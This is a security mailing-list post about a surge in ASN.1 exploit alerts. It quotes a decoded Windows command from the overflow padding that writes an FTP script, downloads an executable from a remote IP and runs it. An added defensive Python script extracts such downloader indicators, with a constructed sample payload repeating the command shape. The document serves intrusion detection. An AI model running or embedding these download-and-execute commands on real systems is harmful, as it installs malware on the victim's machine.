[Snort-users] Increase in ASN.1 alerts

Michael Scheidell michael.scheidell at ...8144...
Wed Feb 2 20:52:55 EST 2011


On 2/2/11 12:53 PM, Joe Gedeon wrote:
> Has anyone else noticed an increase in the number of alerts for
> SPECIFIC-THREATS ASN.1 constructed bit string?  The payload seems
> different than the kill-bill script.
>
yep, over the weekend.
one of our new guys decided to decode it, and got this:

combined the payloads from the ASN.1 and the NOOPs, decoded it and found 
the following command buried in the overflow padding....

cmd /c echo open 210.134.62.199 21 > o&echo user 1 1 >> o &echo get Rewetsr.exe >> o &echo quit >> o &ftp -n -s:o &Rewetsr.exe
-- 
Michael Scheidell, CTO
o: 561-999-5000
d: 561-948-2259
ISN: 1259*1300
SECNAP Network Security Corporation
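A defender's version of the step described in the post (joining the alert payloads and pulling the command out of the overflow padding), as an added example that is not code from the thread: it strips the NOP sled, extracts printable strings the way strings(1) would, and parses the FTP-script downloader shape into indicators for blocking and hunting. The payload bytes, the 192.0.2.10 address and the dropper.exe name are constructed, not taken from a real capture.

```python
import re
from typing import Dict, List, Optional

# Constructed sample payload (not a real capture): a NOP sled, a few bytes
# standing in for shellcode, the embedded FTP-script downloader command, and
# junk filler. The server is a TEST-NET address; the file name is made up.
SAMPLE_PAYLOAD = (
    b"\x90" * 64
    + b"\xeb\x0f\x12\x01"
    + b"cmd /c echo open 192.0.2.10 21 > o&echo user 1 1 >> o &echo get "
      b"dropper.exe >> o &echo quit >> o &ftp -n -s:o &dropper.exe"
    + b"\x00\x7f\x90" * 20
)

# The classic "echo open HOST PORT > script ... ftp -n -s:script" shape.
FTP_SCRIPT_RE = re.compile(
    rb"echo open (?P<host>[\w.\-]+)\s+(?P<port>\d+)\s*>\s*(?P<script>[^\s&]+)"
    rb".*?echo get (?P<file>[^\s&]+)"
    rb".*?ftp\s+-n\s+-s:(?P=script)"
)

def strip_nop_sled(payload: bytes, nop: int = 0x90, min_run: int = 16) -> bytes:
    """Drop a leading run of NOP bytes if it is long enough to be a sled."""
    i = 0
    while i < len(payload) and payload[i] == nop:
        i += 1
    return payload[i:] if i >= min_run else payload

def printable_strings(data: bytes, min_len: int = 8) -> List[str]:
    """Return runs of printable ASCII of at least min_len bytes."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]

def extract_ftp_downloader(payload: bytes) -> Optional[Dict[str, str]]:
    """Find an FTP-script downloader in the padding and return its indicators.

    Returns a dict with host, port, script and file, or None if absent.
    """
    body = strip_nop_sled(payload)
    for s in printable_strings(body):
        m = FTP_SCRIPT_RE.search(s.encode("ascii"))
        if m:
            return {k: v.decode("ascii") for k, v in m.groupdict().items()}
    return None

if __name__ == "__main__":
    print(extract_ftp_downloader(SAMPLE_PAYLOAD))
```

Feed it the concatenated payloads from the ASN.1 and NOP alerts and the returned host, port and file name are the indicators to block and search for in FTP logs.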